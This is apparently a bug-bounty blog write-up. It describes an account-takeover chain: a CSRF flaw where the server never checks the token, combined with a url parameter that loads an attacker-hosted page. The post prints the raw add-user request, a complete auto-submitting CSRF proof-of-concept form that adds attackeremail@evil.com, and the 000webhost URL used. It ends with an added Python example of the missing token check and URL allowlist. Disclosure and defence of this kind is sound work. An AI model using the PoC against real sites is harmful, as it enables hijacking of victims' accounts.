Cross Site Request Forgery: Critical and Exploitable on the Infected Site?

Hossam Mesbah
Oct 29 · 2 min read

Hello again.

In a private program on HackerOne

I found a Cross Site Request Forgery vulnerability, but not the usual kind.

I turned it into a critical CSRF by chaining it with

HTTP Parameter Pollution

Let's write up how it works 🤔

This request adds another user to the account, which is how the attacker obtains permission to access the victim's account:

POST /users/settings/ HTTP/1.1
Host: evilwite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 239
Connection: close
Upgrade-Insecure-Requests: 1

ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com&first_name=mesbah&last_name=mesbah&phone=01032764848&csrf_token=PdsLuVDyQUbQZjbnl4R70oGTUIyKJfl7dHXW0j0jd4H7tAJR%2Fe%2F2P7%2B6akjtBH7thiGbmGhidK29eDguPn2dYg%3D%3D

Okay, what's the problem here? The CSRF token is sent, but the server never validates it.

The user is added anyway.

Okay, so it was an easy CSRF. What now? Create a

CSRF PoC, sure:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://x.website.infected/settings/users" method="POST">
<input type="hidden" name="ThisAction" value="AddUser" />
<input type="hidden" name="NextAction" value="Insert" />
<input type="hidden" name="new&#95;user&#95;email" value="attackeremail&#64;evil&#46;com" />
<input type="hidden" name="first&#95;name" value="mesbah" />
<input type="hidden" name="last&#95;name" value="mesbah" />
<input type="hidden" name="phone" value="01032764848" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

But while searching through the proxy's HTTP history, I accidentally

found a parameter named url on the site. Whatever I put in it is printed in the response.

Of course I tested for Cross Site Scripting, but it didn't work.

That made me stop and think for a few minutes.

I found that I could put another website in this parameter. An example of this parameter:

https://x.website.infected/public/repositry?url=https://y.website.infected/

Okay, please think with me now.

I got a free hosting site and uploaded a file to it.

Now we change the parameter from the original website to my 000webhost website:

https://x.website.infected/public/repositry?url=http://5000mesbah.000webhost.com/csrf.html

Oh my God, it worked on the website.

What's useful about that?

Step 2: I added JS code with a

window.onload function to submit the request.

Now it's a full account takeover,

performed by the infected site, not by the attacker.
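Added example (not code from the original post or the affected site): a defender-side version of the two checks that were missing above, a server that actually compares the csrf_token with the session's token, and an allowlist for the url parameter so the endpoint cannot be pointed at an attacker-hosted page. The session token, the allowed host and the request bodies are constructed for the demo.

```python
import hmac
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the only host the "url" parameter may point at.
# The vulnerable endpoint accepted any host, which let it render a page from 000webhost.
ALLOWED_URL_HOSTS = {"y.website.infected"}


def csrf_token_valid(form_body: str, session_token: str) -> bool:
    """True only if the csrf_token field in the urlencoded body equals the session's token.

    The vulnerable endpoint received a token but never compared it, so a cross-site
    form submission without the right token still added the user.
    """
    fields = parse_qs(form_body, keep_blank_values=True)
    submitted = fields.get("csrf_token", [""])[0]
    # Constant-time comparison; a missing, empty or foreign token fails.
    return bool(submitted) and hmac.compare_digest(submitted, session_token)


def url_param_allowed(url_value: str) -> bool:
    """Accept the url parameter only for https URLs whose host is exactly allowlisted."""
    parts = urlsplit(url_value)
    return parts.scheme == "https" and parts.hostname in ALLOWED_URL_HOSTS


def handle_add_user(form_body: str, session_token: str) -> str:
    """Decide what the /users/settings/ handler should do with an AddUser request."""
    if not csrf_token_valid(form_body, session_token):
        return "rejected: csrf token missing or invalid"
    fields = parse_qs(form_body)
    return "added: " + fields.get("new_user_email", [""])[0]


# Constructed session token for the demo; a real one is random per session.
SESSION_TOKEN = "demo-session-csrf-token"

# Body shaped like the request in the post, carrying the token the session issued.
GOOD_BODY = ("ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com"
             "&first_name=mesbah&last_name=mesbah&csrf_token=" + SESSION_TOKEN)
# Body as sent by the PoC form, which carries no csrf_token field at all.
POC_BODY = "ThisAction=AddUser&NextAction=Insert&new_user_email=attackeremail%40evil.com"

if __name__ == "__main__":
    print(handle_add_user(GOOD_BODY, SESSION_TOKEN))
    print(handle_add_user(POC_BODY, SESSION_TOKEN))
    print(url_param_allowed("https://y.website.infected/"))
    print(url_param_allowed("http://5000mesbah.000webhost.com/csrf.html"))
```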

🤩🤩🤩🤩

It gets even better.

And wait for a new writeup by me.

Vulnerability reported

Vulnerability triaged

Vulnerability: the site has not paid yet 😞😞😞😞

Good bye
